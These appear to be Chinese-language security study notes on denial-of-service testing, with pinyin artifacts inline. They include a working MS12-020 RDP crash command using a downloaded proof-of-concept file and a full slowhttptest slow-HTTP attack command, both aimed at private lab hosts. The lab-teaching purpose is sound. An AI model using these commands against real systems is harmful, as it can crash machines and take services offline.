1、應(yīng)用服務(wù)漏洞
- 服務(wù)代碼存在漏洞,遇異常提交數(shù)據(jù)時程序崩潰
- 應(yīng)用處理大量并發(fā)請求能力有限,被拒絕的是應(yīng)用或OS
2、緩沖區(qū)溢出漏洞
- 向目標(biāo)函數(shù)隨機(jī)提交數(shù)據(jù),特定情況下數(shù)據(jù)覆蓋臨近寄存器或內(nèi)存
- 影響:遠(yuǎn)程代碼執(zhí)行、DoS
- 利用模糊測試方法發(fā)現(xiàn)緩沖區(qū)溢出漏洞
3、測試 MS12-020遠(yuǎn)程桌面協(xié)議DOS漏洞

kali搜索
在18606.txt中查看其說明,
http://aluigi.altervista.org/poc/termdd_1.dat在此路徑下,下載文件,然后按照說明執(zhí)行windows xp開啟3389端口,然后執(zhí)行
nc 192.168.50.185 3389 < termdd_1.dat進(jìn)行多次測試
開啟3389

開始執(zhí)行

導(dǎo)致藍(lán)屏后重啟

重啟
4、slowhttptest(源自google)
- 低帶寬應(yīng)用層慢速DoS攻擊(相對于CC等快速攻擊而言的慢速)
- 最早由Python編寫,跨平臺支持(linux、win、cygwin、osx)
- 尤其擅長攻擊apache、tomcat,對windows的IIS幾乎無效
- 大量應(yīng)用服務(wù)器和安全設(shè)備都無法防護(hù)慢速攻擊
攻擊方法 - 耗盡應(yīng)用的并發(fā)連接池,類似于http層的synflood
- http協(xié)議默認(rèn)在服務(wù)器全部接收請求之后才開始處理,若客戶端發(fā)送速度緩慢或不完整,服務(wù)器時鐘為其保留連接資源池占用,此類大量并發(fā)將導(dǎo)致Dos
- slowloris:完整的http請求結(jié)尾\r\n\r\n(正常情況下),攻擊方\r\n(攻擊情況下,只發(fā)送一個\r\n,服務(wù)端一直等待)
- slow post:http頭content-length聲明長度,但body部分緩慢發(fā)送
- slow read attack攻擊:與slowloris and slow post目的相同;不同之處在于請求正常發(fā)送,但慢速讀取響應(yīng)數(shù)據(jù);攻擊者調(diào)整TCP window窗口大小,是服務(wù)器慢速返回數(shù)據(jù)
- Apache range header attack:客戶端傳輸大文件時,體積超過http body大小限制時進(jìn)行分段;耗盡服務(wù)器CPU、內(nèi)存資源
5、slowhttptest測試
輸入# man slowhttptest,可以看到四種模式

slowhttptest

模式參數(shù)
# slowhttptest -c 10000 -H -g -o my_header_stats -i 10 -r 1 -t GET -u http://192.168.50.183 -x 24 -p 3 -l 9999999

攻擊過程中

應(yīng)用服務(wù)為不可用

服務(wù)不可用
6、其他拒絕服務(wù)
- 使用垃圾郵件塞滿郵箱
- 無意識的/非故意的拒絕服務(wù)攻擊
- 數(shù)據(jù)庫服務(wù)器宕機(jī)恢復(fù)后,引用隊列大量請求洪水涌來
- 告警郵件在郵件服務(wù)器修改地址后洪水攻擊防火墻